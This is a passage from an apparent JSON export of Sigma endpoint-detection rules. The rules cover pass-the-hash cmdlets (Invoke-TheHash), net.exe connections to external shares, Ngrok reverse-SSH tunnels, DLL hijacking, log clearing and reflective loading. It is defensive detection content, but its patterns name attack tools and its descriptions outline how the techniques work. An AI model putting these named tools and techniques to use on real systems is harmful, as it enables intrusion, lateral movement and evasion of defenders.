"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608016Z",
"creation_date": "2026-03-23T11:45:34.608020Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608027Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Invoke-TheHash",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1550/002/"
],
"name": "t1059_001_powershell_malicious_cmdlet_invoke_thehash.yml",
"content": "title: Malicious PowerShell Invoke-TheHash Commandlets Used\nid: 1d290732-2a4c-43db-875e-699d2462cd5d\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Invoke-TheHash module.\n Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB attacks through the .NET TCPClient.\n Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.\n It is recommended to check other PowerShell command and the process behavior for suspicious activities.\nreferences:\n - https://github.com/Kevin-Robertson/Invoke-TheHash\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1550/002/\ndate: 2022/10/12\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.lateral_movement\n - attack.t1550.002\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.Invoke-TheHash\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Invoke-WMIExec'\n - 'Invoke-SMBExec'\n - 'Invoke-SMBEnum'\n - 'Invoke-SMBClient'\n - 'Invoke-TheHash'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d290732-2a4c-43db-875e-699d2462cd5d",
"rule_name": "Malicious PowerShell Invoke-TheHash Commandlets Used",
"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Invoke-TheHash module.\nInvoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB attacks through the .NET TCPClient.\nAuthentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.\nIt is recommended to check other PowerShell command and the process behavior for suspicious activities.\n",
"rule_creation_date": "2022-10-12",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1550.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d329a59-c1ee-4f62-baac-4db01284ac5e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083089Z",
"creation_date": "2026-03-23T11:45:34.083091Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083096Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/",
"https://attack.mitre.org/techniques/T1570/",
"https://attack.mitre.org/techniques/T1048/",
"https://attack.mitre.org/software/S0039/"
],
"name": "t1570_suspicious_network_connection_net.yml",
"content": "title: Suspicious Network Connection by net.exe\nid: 1d329a59-c1ee-4f62-baac-4db01284ac5e\ndescription: |\n Detects suspicious network connections initiated by net.exe to an external IP address.\n Adversaries can mount a remote network share to transfer files to and from the targeted system.\n It is recommended to look for any other malicious behavior on the target host, as well as to check the reputation of the IP address contacted by net.exe.\nreferences:\n - https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/\n - https://attack.mitre.org/techniques/T1570/\n - https://attack.mitre.org/techniques/T1048/\n - https://attack.mitre.org/software/S0039/\ndate: 2023/09/05\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1570\n - attack.exfiltration\n - attack.t1048\n - attack.s0039\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.FileDownload\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n ProcessImage|endswith: '\\net.exe'\n ProcessCommandLine|re:\n - ' \\\\\\\\[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\\\' # IP\n - ' \\\\\\\\\\S+\\.([a-zA-Z]{2,63}|[xX][nN]--[a-zA-Z0-9-]{1,59})\\\\' # Domain\n - ' http(s|)://' # HTTP\n DestinationIsIpv6: 'false'\n\n filter_ip:\n DestinationIp|cidr:\n - '127.0.0.0/8' # RFC1122\n - '192.168.0.0/16' # RFC1918\n - '172.16.0.0/12' # RFC1918\n - '10.0.0.0/8' # RFC1918\n - '169.254.0.0/16' # RFC3927\n - 'fe80::/10'\n - '100.64.0.0/10' # RFC6598\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d329a59-c1ee-4f62-baac-4db01284ac5e",
"rule_name": "Suspicious Network Connection by net.exe",
"rule_description": "Detects suspicious network connections initiated by net.exe to an external IP address.\nAdversaries can mount a remote network share to transfer files to and from the targeted system.\nIt is recommended to look for any other malicious behavior on the target host, as well as to check the reputation of the IP address contacted by net.exe.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1048",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d38f72c-c5fe-4c2b-b710-12190bf78d90",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612190Z",
"creation_date": "2026-03-23T11:45:34.612194Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612201Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/hakluke/status/1679023050526687244",
"https://twitter.com/malmoeb/status/1519710302820089857",
"https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/software/S0508/"
],
"name": "t1090_linux_ngrok_ssh.yml",
"content": "title: Ngrok Tunnel via SSH (Linux)\nid: 1d38f72c-c5fe-4c2b-b710-12190bf78d90\ndescription: |\n Detects a connection to the official Ngrok Tunnel Server using the SSH command-line tool.\n Ngrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\n It isn't necessary to download the Ngrok binary to use an Ngrok tunnel; this can be done by creating a reverse SSH tunnel to the Ngrok servers.\n It is recommended to investigate this action to determine its legitimacy.\n If you believe this to be an indicator of malicious activity, it is recommended to investigate which users were compromised and what resources the attacker accessed using this tunnel.\nreferences:\n - https://twitter.com/hakluke/status/1679023050526687244\n - https://twitter.com/malmoeb/status/1519710302820089857\n - https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/software/S0508/\ndate: 2023/07/13\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - attack.s0508\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Ngrok\n - classification.Linux.Behavior.Tunneling\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ssh'\n CommandLine|contains:\n - 'tunnel.??.ngrok.com'\n - 'tunnel.ngrok.com'\n - '.ngrok-agent.com'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d38f72c-c5fe-4c2b-b710-12190bf78d90",
"rule_name": "Ngrok Tunnel via SSH (Linux)",
"rule_description": "Detects a connection to the official Ngrok Tunnel Server using the SSH command-line tool.\nNgrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\nIt isn't necessary to download the Ngrok binary to use an Ngrok tunnel; this can be done by creating a reverse SSH tunnel to the Ngrok servers.\nIt is recommended to investigate this action to determine its legitimacy.\nIf you believe this to be an indicator of malicious activity, it is recommended to investigate which users were compromised and what resources the attacker accessed using this tunnel.\n",
"rule_creation_date": "2023-07-13",
"rule_modified_date": "2025-01-09",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d3f9140-d12e-4ac2-ae0f-302dc6ba9c21",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099280Z",
"creation_date": "2026-03-23T11:45:34.099282Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099286Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_synchost.yml",
"content": "title: DLL Hijacking via synchost.exe\nid: 1d3f9140-d12e-4ac2-ae0f-302dc6ba9c21\ndescription: |\n Detects potential Windows DLL Hijacking via synchost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'synchost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\policymanager.dll'\n - '\\PROPSYS.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d3f9140-d12e-4ac2-ae0f-302dc6ba9c21",
"rule_name": "DLL Hijacking via synchost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via synchost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d42a517-fd7d-4aa1-bdea-8bb23464d866",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627863Z",
"creation_date": "2026-03-23T11:45:34.627866Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627886Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/001/"
],
"name": "t1070_001_clear_windows_application_log_no_process.yml",
"content": "title: Windows Application Log Cleared\nid: 1d42a517-fd7d-4aa1-bdea-8bb23464d866\ndescription: |\n Detects when one of the Windows application logs is cleared by an unknown process.\n Windows Event Logs are a record of a computer's alerts and notifications.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n It is recommended to investigate the process responsible for this action as well as to look for suspicious activities on the host preceding the clearing of the logs.\nreferences:\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2026/01/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 104\n Source: Microsoft-Windows-Eventlog\n\n # This is handled by the rule 43a740ac-2e54-4653-84a7-349b469a0a35\n filter_process:\n ProcessImage|contains: '?'\n\n exclusion_channel:\n Channel:\n - 'ModemAuthenticatorLog'\n - 'Microsoft-Exchange-ManagedAvailability/ThrottlingConfig'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d42a517-fd7d-4aa1-bdea-8bb23464d866",
"rule_name": "Windows Application Log Cleared",
"rule_description": "Detects when one of the Windows application logs is cleared by an unknown process.\nWindows Event Logs are a record of a computer's alerts and notifications.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nIt is recommended to investigate the process responsible for this action as well as to look for suspicious activities on the host preceding the clearing of the logs.\n",
"rule_creation_date": "2026-01-15",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d5ccdaa-b937-4d62-a941-fc69637a870a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605699Z",
"creation_date": "2026-03-23T11:45:34.605702Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605710Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/09cef802316c0db576963b2742b506a9f274f4ae/atomics/T1614.001/T1614.001.md",
"https://attack.mitre.org/techniques/T1614/001/",
"https://attack.mitre.org/techniques/T1480/"
],
"name": "t1614_001_system_language_discovery_chcp.yml",
"content": "title: System Language Discovered via chcp\nid: 1d5ccdaa-b937-4d62-a941-fc69637a870a\ndescription: |\n Detects the identification of the system language using the chcp utility.\n Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.\n It is recommended to analyze the parent process to look for malicious content or other suspicious actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/09cef802316c0db576963b2742b506a9f274f4ae/atomics/T1614.001/T1614.001.md\n - https://attack.mitre.org/techniques/T1614/001/\n - https://attack.mitre.org/techniques/T1480/\ndate: 2022/12/23\nmodified: 2025/10/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1480\n - attack.discovery\n - attack.t1614\n - attack.t1614.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'CHCP.COM'\n CommandLine: 'chcp'\n\n exclusion_programfiles:\n GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_grandparent:\n GrandparentImage:\n - '?\\Users\\\\*\\AppData\\Local\\Ankama\\Retro\\Dofus Retro.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\RingCentral\\RingCentral.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\shadow\\Shadow.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\RealtimeBoard\\\\*\\Miro.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\gitkraken\\app-*\\gitkraken.exe'\n - '?:\\Windows\\Prey\\versions\\\\*\\bin\\node.exe'\n - '*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Blitz\\Blitz.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Sky\\Sky Go\\Sky Go.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\monsisraapp\\MonSisra2.exe'\n - 
'?:\\Users\\\\*\\AppData\\Local\\Programs\\monsisra\\MonSisra2.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\MonSisra2\\MonSisra2.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files\\NSClient++\\nscp.exe'\n - '\\UCMDB\\DataFlowProbe\\bin\\jre\\bin\\discovery_probe.exe|'\n - '?:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe'\n - '?:\\Program Files (x86)\\CheckPoint\\Endpoint Connect\\openmail.exe'\n\n exclusion_commandline:\n - ParentCommandLine:\n - '?:\\windows\\system32\\cmd.exe /d /s /c chcp'\n - '?:\\Windows\\System32\\cmd.exe /D /C chcp'\n - 'cmd.exe /x/d/c chcp'\n - 'cmd.exe /d /s /c chcp'\n - GrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\cmd.exe /d /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*.bat'\n - '?:\\windows\\system32\\cmd.exe /d /c ?:\\ProgramData\\\\*\\\\*.bat'\n - '?:\\windows\\system32\\cmd.exe /d /c ?:\\windows\\TEMP\\\\*\\\\*.bat'\n - '?:\\Windows\\System32\\cmd.exe /c *\\Bruker\\TopSpin*\\\\*'\n\n exclusion_parsys:\n CurrentDirectory|contains: 'parsys'\n GrandparentImage|endswith: '\\station.exe'\n\n exclusion_smadmin:\n ParentCommandLine|contains: '\\SMadmin\\'\n\n exclusion_anaconda:\n - GrandparentCommandLine|contains: '\\anaconda'\n - Ancestors|contains:\n - '\\anaconda3\\Scripts\\conda.exe|'\n - '\\Anaconda\\Scripts\\conda.exe|'\n - '\\miniconda\\Scripts\\conda.exe|'\n - '\\miniconda3\\Scripts\\conda.exe|'\n\n exclusion_vray:\n CurrentDirectory|contains: '\\V-Ray\\'\n\n exclusion_googlecloud:\n CurrentDirectory|contains: '\\Google\\Cloud SDK\\'\n\n exclusion_autodesk:\n GrandparentImage|endswith: '\\Autodesk Installer.exe'\n\n exclusion_varian:\n GrandparentCommandLine|contains:\n - '?:\\Program Files\\Varian\\'\n - '?:\\Program Files (x86)\\Varian\\'\n\n exclusion_unity:\n CurrentDirectory|startswith:\n - '?:\\Program Files\\Unity\\Hub\\Editor\\'\n - '?:\\Program Files (x86)\\Unity\\Hub\\Editor\\'\n\n exclusion_postgres:\n GrandparentCommandLine: '?:\\windows\\system32\\cmd.exe /c ?:\\Program 
Files\\PostgreSQL\\\\??\\scripts\\runpsql.bat'\n\n exclusion_discord:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /d /s /c chcp'\n GrandparentCommandLine:\n - '*\\Discord\\app-*\\Discord.exe'\n # Discord.exe --overlay-host\n - '*\\Discord\\app-*\\Discord.exe *'\n\n exclusion_node:\n - ProcessGrandparentOriginalFileName: 'node.exe'\n - Ancestors|contains: '|?:\\Program Files\\nodejs\\node.exe|'\n\n exclusion_schedule:\n - GrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessParentGrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d5ccdaa-b937-4d62-a941-fc69637a870a",
"rule_name": "System Language Discovered via chcp",
"rule_description": "Detects the identification of the system language using the chcp utility.\nAdversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.\nIt is recommended to analyze the parent process to look for malicious content or other suspicious actions.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-10-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1480",
"attack.t1614",
"attack.t1614.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d9e6035-5064-4ba3-8bf6-1759b2641f54",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598091Z",
"creation_date": "2026-03-23T11:45:34.598097Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598110Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f",
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1620_reflective_loading_file.yml",
"content": "title: Suspicious Executable Reflective Loading File Created\nid: 1d9e6035-5064-4ba3-8bf6-1759b2641f54\ndescription: |\n Detects the creation of a specific file related to reflective binary execution on macOS.\n Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.\n It is recommended to check for malicious activities by the process creating the file.\nreferences:\n - https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f\n - https://attack.mitre.org/techniques/T1620/\ndate: 2024/04/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.MemoryExecution\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection:\n Path|contains: '/NSCreateObjectFileImageFromMemory-'\n Kind: 'create'\n ProcessImage|contains: '?'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/System/Library/'\n - '/Library/Application Support/'\n - '/library/frameworks/'\n - '/Applications/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d9e6035-5064-4ba3-8bf6-1759b2641f54",
"rule_name": "Suspicious Executable Reflective Loading File Created",
"rule_description": "Detects the creation of a specific file related to reflective binary execution on macOS.\nAdversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.\nIt is recommended to check for malicious activities by the process creating the file.\n",
"rule_creation_date": "2024-04-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1dff2e4d-9edd-4b48-af83-6c559ea3e9c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075932Z",
"creation_date": "2026-03-23T11:45:34.075934Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075938Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
